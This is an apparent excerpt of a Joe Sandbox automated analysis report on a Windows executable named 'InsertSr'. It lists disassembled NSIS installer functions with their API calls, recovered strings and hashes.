                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                            • EnableWindow.USER32(?,?), ref: 00405757
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                            • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                            • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                            • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: @rD
                                                                            • API String ID: 3282139019-3814967855
                                                                            • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                            • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                            Control-flow Graph (graph image not reproduced; basic blocks 4015a0-4030f2, API calls listed below)
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                            Strings
                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                            • Jump: %d, xrefs: 00401602
                                                                            • Rename: %s, xrefs: 004018F8
                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                            • BringToFront, xrefs: 004016BD
                                                                            • Call: %d, xrefs: 0040165A
                                                                            • detailprint: %s, xrefs: 00401679
                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                            • Sleep(%d), xrefs: 0040169D
                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                            • API String ID: 2872004960-3619442763
                                                                            • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                            • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                            Control-flow Graph (graph image not reproduced; basic blocks 40592c-405c3e, API calls listed below)
                                                                            APIs
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                            • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                            • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                            • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                              • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                            • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 608394941-1650083594
                                                                            • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                            • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • lstrcatW.KERNEL32(00000000,00000000,JoyAustria,004CB0B0,00000000,00000000), ref: 00401A76
                                                                            • CompareFileTime.KERNEL32(-00000014,?,JoyAustria,JoyAustria,00000000,00000000,JoyAustria,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$JoyAustria
                                                                            • API String ID: 4286501637-4188998851
                                                                            • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                            • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 403587-4035d5; legend: Executed / Not Executed)
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403598
                                                                            • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                            Strings
                                                                            • soft, xrefs: 00403675
                                                                            • Error launching installer, xrefs: 004035D7
                                                                            • Null, xrefs: 0040367E
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                            • Inst, xrefs: 0040366C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-527102705
                                                                            • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                            • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 40337f-403396; legend: Executed / Not Executed)
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004033E7
                                                                            • GetTickCount.KERNEL32 ref: 00403464
                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                            • wsprintfW.USER32 ref: 004034A4
                                                                            • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                            • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                            • String ID: ... %d%%$P1B$X1C$X1C
                                                                            • API String ID: 651206458-1535804072
                                                                            • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                            • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 404f72-404f85; legend: Executed / Not Executed)
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                            • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2740478559-0
                                                                            • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                            • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 401eb9-401ec4; legend: Executed / Not Executed)
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGloballstrcpyn
                                                                            • String ID: Exch: stack < %d elements$JoyAustria$Pop: stack empty
                                                                            • API String ID: 1459762280-1086466899
                                                                            • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                            • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 402713-40273b; legend: Executed / Not Executed)
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                            • String ID: <RM>$JoyAustria$WriteINIStr: wrote [%s] %s=%s in %s
                                                                            • API String ID: 247603264-782302037
                                                                            • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                            • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                             Control-flow Graph (rendered graph not reproduced; entry block 4021b5-40220b; legend: Executed / Not Executed)
                                                                            APIs
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                            • API String ID: 3156913733-2180253247

                                                                            Control-flow Graph (rendered graph not recoverable; basic blocks 405e7f-405ed1, with GetTickCount and GetTempFileNameW called in block 405e8c-405ec0)
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405E9D
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: nsa
                                                                            • API String ID: 1716503409-2209301699

                                                                            Control-flow Graph (rendered graph not recoverable; basic blocks 402175-4021b0 with subcalls to 401446 and 4062a3, ShowWindow in block 40219f-4021a5, EnableWindow in block 4021aa-4021b0, both exiting to 4030e3-4030f2)
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
